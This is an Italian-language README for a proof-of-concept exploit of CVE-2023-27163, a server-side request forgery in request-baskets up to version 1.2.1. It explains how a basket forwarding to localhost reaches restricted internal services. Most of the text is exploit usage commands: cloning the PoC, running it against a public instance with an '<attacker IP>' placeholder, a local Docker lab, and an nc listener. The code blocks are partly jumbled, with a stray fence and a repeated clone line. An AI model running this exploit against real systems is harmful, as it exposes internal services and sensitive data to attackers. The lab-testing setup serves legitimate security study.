
Prova di concetto per Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)
Questo repository contiene una Prova di concetto (PoC) per CVE-2023-27163, una vulnerabilità di Server-Side Request Forgery (SSRF) scoperta in request-baskets fino alla versione 1.2.1. Questa vulnerabilità consente agli aggressori di accedere a risorse di rete e informazioni sensibili sfruttando il componente /api/baskets/{name} tramite una richiesta API appositamente predisposta.
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
Request-baskets è un'applicazione web progettata per raccogliere e registrare richieste su una rotta specifica, il cosiddetto basket. Quando la si crea, l'utente può specificare un altro server a cui inoltrare la richiesta. Il problema è che l'utente può specificare servizi non desiderati, come applicazioni chiuse alla rete.
Ad esempio: supponiamo che il server ospiti Request-baskets (porta 55555) e un server web Flask sulla porta 8000. Flask è anche configurato per interagire solo con localhost. Creando un basket che inoltra a http://localhost:8000, l'aggressore può accedere al server web Flask precedentemente limitato.

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git
2. Scarica la PoC
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/